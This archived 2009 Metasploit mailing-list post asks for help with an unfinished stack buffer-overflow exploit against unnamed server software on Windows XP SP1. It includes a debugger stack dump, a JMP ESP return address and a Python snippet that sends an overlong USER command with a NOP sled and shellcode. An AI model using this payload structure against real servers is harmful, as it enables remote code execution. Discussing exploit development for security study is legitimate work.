Metasploit mailing list archives

No room for shellcode

From: allendb760 at googlemail.com (DB Allen)
Date: Sat, 2 May 2009 17:31:04 +0100

It's not a specific metasploit question - but I did use metasploit to
generate the shellcode :-). I trying to write an exploit for a popular
server based software but don't have room for the shellcode anywhere.

Here is a copy of the stack (doing this on XP SP1. so no DEP):

************   ***********  ********

00A4FD40   41414141  AAAA
00A4FD44   41414141  AAAA
00A4FD48   41414141  AAAA
00A4FD4C   41414141  AAAA
00A4FD50   41414141  AAAA
00A4FD54   77D718FC  ??w  USER32.77D718FC  -> JMP ESP
00A4FD58   90909090  ????
00A4FD5C   90909090  ????   -> ESP
00A4FD60   90909090  ????
00A4FD64   90909090  ????
00A4FD68   4DEB6AFC  ?j?M   -> Shellcode start (should be 317 bytes)
00A4FD6C   FFFFF9E8  ????
00A4FD70   6C8B60FF  ?`?l
00A4FD74   458B2424  $$?E
00A4FD78   057C8B3C  <?|
00A4FD7C   8BEF0178  x??
00A4FD80   5F8B184F  O?_
00A4FD84   49EB0120   ?I
00A4FD88   018B348B  ?4?
00A4FD8C   99C031EE  ?1??
00A4FD90   74C084AC  ???t
00A4FD94   20CAC107  ??    -> Shellcode goes tits up.
00A4FD98   746E6320   xxxx    -> Normal program code (obsfucated)
00A4FD9C   6C492072  xxxx
00A4FDA0   6167656C  xxxx
00A4FDA4   7375206C  xxxx
00A4FDA8   64697265  xxxx   Pointer to next SEH record
00A4FDAC  6F4C202E  xxxx  SE handler
00A4FDB0   206E6967  xxxx



The buffer is 480 bytes to cause the overflow.

Here is the relevant bit of Python:

#JMP ESP XP SP1
jmp_sp1 = '\xfc\x18\xd7\x77'
user = 'USER '
buff = "A" * 480
NOP = '\x90'

s.connect(('192.168.2.4', XXXX))
s.recv(1024)

while 1:
    s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n")

I'm thinking that I can include the shellcode as part of the buffer and find
a static JMP [ESP-xxx] in memory, that could send the execution flow back
into the buffer and to the shellcode.

Is this a normal method to chose? Also is it reliable across OS's of the
same service pack?

If there is a better way, I'd love to hear it.

Thanks,

DB
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090502/f7729256/attachment.htm>

Current thread:

No room for shellcode DB Allen (May 02)
- No room for shellcode egypt at metasploit.com (May 02)
  - No room for shellcode Patrick Webster (May 03)
    - No room for shellcode DB Allen (May 03)
    - No room for shellcode H D Moore (May 03)
    - No room for shellcode DB Allen (May 03)
    - No room for shellcode H D Moore (May 03)
    - No room for shellcode DB Allen (May 04)
    - No room for shellcode Patrick Webster (May 05)
    - No room for shellcode Kim Guldberg (May 03)